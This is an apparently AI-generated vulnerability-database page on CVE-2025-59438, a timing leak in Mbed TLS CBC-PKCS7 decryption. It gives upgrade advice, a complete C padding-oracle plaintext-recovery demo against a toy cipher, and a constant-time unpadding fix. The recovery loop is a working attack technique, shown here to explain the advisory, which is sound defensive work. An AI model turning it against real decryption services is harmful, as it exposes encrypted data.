
Cloud Vulnerability DB
A community-led vulnerabilities database
Mbed TLS through version 3.6.4 contains an Observable Timing Discrepancy vulnerability (CVE-2025-59438). The vulnerability was discovered by Beat Heeb of Oberon microsystems AG and was disclosed on October 15, 2025. All versions of Mbed TLS up to and including 3.6.4 are affected; version 3.6.5 and later are not (Mbed Advisory).
The vulnerability stems from timing differences in error reporting during padding operations in symmetric encryption modes. In the PSA API, when the built-in implementation of CBC-PKCS7 is used, the PSA functions psa_cipher_decrypt() and psa_cipher_finish() translate error codes in a way that is not constant-time. A local, unprivileged attacker running on the same hardware can therefore observe which error was raised by timing shared microarchitectural resources such as the code cache or the branch predictor. The vulnerability has been assigned a CVSS v3.1 base score of 5.3 (Medium) with vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (AttackerKB). Note that this vector's network attack vector (AV:N) does not match the advisory's description of a local attacker measuring shared microarchitectural state; when prioritising, use the advisory's local-attacker threat model rather than the vector string alone.
The vulnerability could allow local attackers to recover plaintexts encrypted with CBC-PKCS7, or with other symmetric encryption modes that use padding, when they are decrypted through the PSA API. Applications that use the legacy API to decrypt with padding may also be affected through their own error handling. This is a padding oracle scenario: an attacker who can submit chosen ciphertexts for decryption and learn whether the padding was valid gains partial information about the plaintext with each query, and repeated queries can recover it byte by byte (Mbed Advisory).
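The padding oracle attack the advisory describes, as an added worked example that is not part of this page or of the Mbed TLS code base. It uses a constructed toy block cipher (XOR with a key byte plus a bit rotation, not AES) because the attack never looks inside the cipher, and it models the CVE's timing leak as a function that returns the padding-validity bit directly. The key, IV, message and every function name here are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLK 16

/* Constructed toy block cipher, NOT AES and not Mbed TLS code: per-byte XOR
 * with a key byte, then a fixed bit rotation. It is a deterministic bijection,
 * which is all the attack needs; the attack never looks inside the cipher. */
static const uint8_t KEY[BLK] = {
    0x3a, 0x91, 0xc4, 0x07, 0x5e, 0xd2, 0x68, 0xbf,
    0x13, 0xe5, 0x7c, 0xa0, 0x29, 0x86, 0x4d, 0xf1 };

static uint8_t rotl8(uint8_t v, int n) { return (uint8_t)((v << n) | (v >> (8 - n))); }
static uint8_t rotr8(uint8_t v, int n) { return (uint8_t)((v >> n) | (v << (8 - n))); }
static void enc_block(const uint8_t in[BLK], uint8_t out[BLK]) {
    for (int i = 0; i < BLK; i++) out[i] = rotl8(in[i] ^ KEY[i], i % 7 + 1);
}
static void dec_block(const uint8_t in[BLK], uint8_t out[BLK]) {
    for (int i = 0; i < BLK; i++) out[i] = rotr8(in[i], i % 7 + 1) ^ KEY[i];
}

/* CBC-PKCS7 encryption; returns the ciphertext length (a multiple of BLK). */
static size_t cbc_pkcs7_encrypt(const uint8_t iv[BLK], const uint8_t *msg,
                                size_t len, uint8_t *ct) {
    uint8_t pad = (uint8_t)(BLK - len % BLK), prev[BLK], blk[BLK];
    size_t total = len + pad;
    memcpy(prev, iv, BLK);
    for (size_t i = 0; i < total; i += BLK) {
        for (int k = 0; k < BLK; k++)
            blk[k] = ((i + k < len) ? msg[i + k] : pad) ^ prev[k];
        enc_block(blk, ct + i);
        memcpy(prev, ct + i, BLK);
    }
    return total;
}

/* The oracle the attacker exploits: decrypt one block against a chosen
 * "previous" block and report only whether the PKCS#7 padding is valid. In
 * CVE-2025-59438 that bit leaks through timing; here it is returned directly. */
static int padding_oracle(const uint8_t prev[BLK], const uint8_t blk[BLK]) {
    uint8_t p[BLK];
    dec_block(blk, p);
    for (int k = 0; k < BLK; k++) p[k] ^= prev[k];
    uint8_t pad = p[BLK - 1];
    if (pad == 0 || pad > BLK) return 0;
    for (int k = BLK - pad; k < BLK; k++) if (p[k] != pad) return 0;
    return 1;
}

/* Recover plaintext block P_i from (C_{i-1}, C_i): learn I = dec(C_i) one byte
 * at a time by forging the previous block so the padding reads 01, 02 02, ... */
static void recover_block(const uint8_t cprev[BLK], const uint8_t cblk[BLK],
                          uint8_t out[BLK]) {
    uint8_t inter[BLK] = {0}, x[BLK];
    for (int j = BLK - 1; j >= 0; j--) {
        uint8_t pad = (uint8_t)(BLK - j);
        memset(x, 0, BLK);
        for (int k = j + 1; k < BLK; k++) x[k] = inter[k] ^ pad; /* known tail -> pad */
        for (int g = 0; g < 256; g++) {
            x[j] = (uint8_t)g;
            if (!padding_oracle(x, cblk)) continue;
            if (j == BLK - 1) {
                /* Edge case: the first hit may be valid because the tail reads
                 * 02 02 (or longer) rather than 01. Disturbing the byte before
                 * it keeps a genuine 01 valid but breaks any longer padding. */
                x[j - 1] ^= 0xff;
                int genuine = padding_oracle(x, cblk);
                x[j - 1] ^= 0xff;
                if (!genuine) continue;
            }
            inter[j] = (uint8_t)(g ^ pad);
            break;
        }
        out[j] = inter[j] ^ cprev[j];   /* P_i[j] = I[j] XOR C_{i-1}[j] */
    }
}

/* Constructed demo: encrypt a 31-byte message (two blocks, one 0x01 pad byte)
 * and recover it through the oracle alone; the IV acts as C_0. Returns 1 on
 * success. The recovered buffer still carries the padding byte. */
static int demo_padding_oracle(void) {
    static const uint8_t iv[BLK] = { 0xde, 0xad, 0xbe, 0xef, 0x01, 0x23, 0x45, 0x67,
                                     0x89, 0xab, 0xcd, 0xef, 0x10, 0x32, 0x54, 0x76 };
    const char *msg = "attack at dawn, CBC-PKCS7 leaks";
    uint8_t ct[64], rec[64];
    size_t n = cbc_pkcs7_encrypt(iv, (const uint8_t *)msg, strlen(msg), ct);
    for (size_t i = 0; i < n; i += BLK)
        recover_block(i == 0 ? iv : ct + i - BLK, ct + i, rec + i);
    return n == 32 && memcmp(rec, msg, 31) == 0 && rec[31] == 0x01;
}

int main(void) {
    printf("padding oracle recovery %s\n", demo_padding_oracle() ? "succeeded" : "failed");
    return 0;
}
```

Each byte costs at most 256 oracle queries plus one disambiguation query for the final byte of a block, so a 16-byte block falls in well under 5,000 queries. Against a real system the `padding_oracle()` call stands for the attacker's timing measurement of the victim's decryption, which is why the advisory treats the leak as a plaintext-recovery problem rather than a mere information disclosure.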
Users are recommended to upgrade to Mbed TLS 3.6.5 or TF-PSA-Crypto 1.0.0 or later. Applications using mbedtls_cipher_crypt() or mbedtls_cipher_finish() with CBC or ECB mode with padding should review their error handling and consider switching to the new function mbedtls_cipher_finish_padded(). Additionally, applications that decrypt with PSA_ALG_CBC_PKCS7 should handle errors carefully if local timing attacks are a concern: a padding failure must not be distinguishable from any other decryption failure by timing, by error code, or by the application's subsequent behaviour (Mbed Advisory).
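What "review their error handling" means in practice, as an added example that is not taken from this page or from Mbed TLS: a leaky PKCS#7 unpadding routine beside a constant-time one that examines the whole final block, branches on nothing secret, and returns a single error code for every failure. The function names and sample blocks are constructed for the example; mbedtls_cipher_finish_padded() itself is not reproduced here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BLK 16

/* Leaky PKCS#7 unpadding (constructed, not Mbed TLS code): it returns early on
 * the first bad byte and reports a different error for a bad length than for a
 * bad byte, so both control flow and the error code depend on secret data. */
static int unpad_leaky(const uint8_t *buf, size_t len, size_t *out_len) {
    uint8_t pad = buf[len - 1];
    if (pad == 0 || pad > BLK) return -1;                    /* "bad length" */
    for (size_t i = len - pad; i < len; i++)
        if (buf[i] != pad) return -2;                         /* "bad byte" */
    *out_len = len - pad;
    return 0;
}

/* Branch-free masks: all ones when the condition holds, all zeros otherwise.
 * Inputs are bytes and buffer lengths, so they stay well below 2^31. */
static uint32_t ct_eq_mask(uint32_t a, uint32_t b) {
    uint32_t d = a ^ b;
    return ((d | (0u - d)) >> 31) - 1u;                       /* d == 0 -> all ones */
}
static uint32_t ct_lt_mask(uint32_t a, uint32_t b) {
    return 0u - ((a - b) >> 31);                              /* a < b  -> all ones */
}

/* Constant-time PKCS#7 unpadding: always examines the whole final block, never
 * branches on padding bytes, and collapses every failure into one error code so
 * timing cannot tell "bad length" from "bad byte". */
static int unpad_ct(const uint8_t *buf, size_t len, size_t *out_len) {
    if (len < BLK || len % BLK != 0) return -1;             /* public length, may branch */
    uint32_t pad = buf[len - 1];
    uint32_t bad = ct_eq_mask(pad, 0) | ct_lt_mask(BLK, pad); /* pad outside 1..BLK */
    for (uint32_t i = 0; i < BLK; i++) {
        uint32_t pos = (uint32_t)len - BLK + i;
        uint32_t in_pad = ct_lt_mask((uint32_t)len - 1 - pos, pad); /* one of the last pad bytes */
        bad |= in_pad & ~ct_eq_mask(buf[pos], pad);
    }
    *out_len = (size_t)(((uint32_t)len - pad) & ~bad);        /* 0 on failure */
    return -(int)(bad & 1u);                                  /* 0 or -1, no branch */
}

/* Constructed inputs: a valid block, a bad-length block and a bad-byte block.
 * Returns 1 when the leaky check tells the two failures apart (-1 vs -2) while
 * the constant-time check returns the same -1 for both and accepts the valid one. */
static int demo_unpad(void) {
    const uint8_t good[BLK]     = { 'h','e','l','l','o', 11,11,11,11,11,11,11,11,11,11,11 };
    const uint8_t bad_len[BLK]  = { 'h','e','l','l','o', 11,11,11,11,11,11,11,11,11,11, 0 };
    const uint8_t bad_byte[BLK] = { 'x','x','x','x','x','x','x','x','x','x','x','x','x', 2,3,3 };
    size_t n = 99;
    int ok = unpad_ct(good, BLK, &n) == 0 && n == 5;
    ok = ok && unpad_leaky(bad_len, BLK, &n) == -1 && unpad_leaky(bad_byte, BLK, &n) == -2;
    ok = ok && unpad_ct(bad_len, BLK, &n) == -1 && n == 0;
    ok = ok && unpad_ct(bad_byte, BLK, &n) == -1 && n == 0;
    return ok;
}

int main(void) {
    printf("constant-time unpad demo %s\n", demo_unpad() ? "ok" : "FAILED");
    return 0;
}
```

The single return code is only half of the fix: whatever the caller does after a failure (logging a distinct message, returning a different status to a peer, taking a slower cleanup path) reopens the oracle, which is why the advisory also asks applications to review their own error handling rather than relying on the library alone.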
Source: This report was generated using AI